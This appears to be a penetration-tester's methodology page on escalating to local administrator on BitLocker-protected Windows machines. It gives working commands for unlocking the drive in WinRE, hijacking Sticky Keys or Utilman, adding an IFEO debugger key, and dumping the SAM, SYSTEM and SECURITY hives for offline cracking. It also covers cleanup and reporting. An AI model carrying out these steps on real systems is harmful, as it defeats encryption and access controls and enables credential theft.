BitLocker
If we have access to a BitLocker recovery key for the machine, we can boot into the Windows Recovery Environment (WinRE), unlock the volume and tamper with the OS to add our user to the local Administrators group.
Recovering the key via hybrid identity (Entra ID)
In most engagements the assigned account is a hybrid identity (synced from on-prem AD to Entra ID) and the workstation is Entra-joined / hybrid-joined and registered as owned by that user.
By default, the Entra ID tenant allows users to retrieve the BitLocker recovery keys of devices they own (the Users can recover BitLocker keys for their owned devices setting is On by default).
Check the join state of the device:
dsregcmd /statusLook for AzureAdJoined : YES / DomainJoined : YES and a DeviceId. With the user's Entra credentials, the recovery key is then available at:
- https://myaccount.microsoft.com/device-list: pick the device, then View BitLocker keys
- https://account.microsoft.com/devices for personal/MSA scenarios
If the device is only Intune/Entra-managed (no on-prem join) the key may also be exposed in the Company Portal.
Booting into WinRE and unlocking the volume
- Reboot the host and force entry into WinRE (hold Shift while clicking Restart, or interrupt the boot three times).
- Navigate to Troubleshoot > Advanced options > Command Prompt.
- Provide the recovery key when prompted, or unlock from the shell:
manage-bde -status
manage-bde -unlock C: -RecoveryPassword XXXXXX-XXXXXX-XXXXXX-XXXXXX-XXXXXX-XXXXXX-XXXXXX-XXXXXXIn WinRE the system drive is often mapped to D: (or another letter). Verify with dir before patching paths below.
Adding the user to local Administrators
With the volume mounted, the goal is to make code run as NT AUTHORITY\SYSTEM on the next boot. A few reliable options:
Sticky Keys hijack (sethc.exe)
Replace the Sticky Keys binary with cmd.exe. Pressing Shift five times on the logon screen then spawns a SYSTEM shell.
copy C:\Windows\System32\sethc.exe C:\Windows\System32\sethc.exe.bak
copy /y C:\Windows\System32\cmd.exe C:\Windows\System32\sethc.exeReboot, hit Shift x5 at the logon screen and add the target user:
whoami
net localgroup Administrators <DOMAIN>\<user> /addFor non-English systems, use the localised group name (e.g. Administratoren on German Windows) or the well-known SID:
net localgroup "S-1-5-32-544" <DOMAIN>\<user> /addUtilman hijack (utilman.exe)
Same trick, but the binary is launched via Win + U (Ease of Access) on the logon screen. Useful if sethc.exe is monitored.
copy C:\Windows\System32\utilman.exe C:\Windows\System32\utilman.exe.bak
copy /y C:\Windows\System32\cmd.exe C:\Windows\System32\utilman.exeOther accessibility binaries (osk.exe, Narrator.exe, DisplaySwitch.exe, Magnify.exe) work equivalently and may evade naive detections.
Image File Execution Options debugger
Instead of overwriting a binary, register a Debugger value so the OS launches cmd.exe whenever the accessibility tool is invoked. This survives WDAC/AppLocker rules that whitelist sethc.exe by hash/path.
reg load HKLM\TMP C:\Windows\System32\config\SOFTWARE
reg add "HKLM\TMP\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe" /v Debugger /t REG_SZ /d "C:\Windows\System32\cmd.exe" /f
reg unload HKLM\TMPOffline SAM / SYSTEM extraction
If touching the OS is undesirable, copy the hives off the host and crack/pass-the-hash the local accounts offline:
copy C:\Windows\System32\config\SAM X:\loot\
copy C:\Windows\System32\config\SYSTEM X:\loot\
copy C:\Windows\System32\config\SECURITY X:\loot\Then on the attacker host:
impacket-secretsdump -sam SAM -system SYSTEM -security SECURITY LOCALCleanup
- Restore any binaries that were swapped (
sethc.exe.bakback tosethc.exe). - Remove
Image File Execution Optionskeys created during the attack. - Re-enable BitLocker protectors if they were suspended, and document in the report that the disclosed recovery key should be rotated (
manage-bde -protectors -delete C: -type RecoveryPasswordfollowed bymanage-bde -protectors -add C: -RecoveryPassword).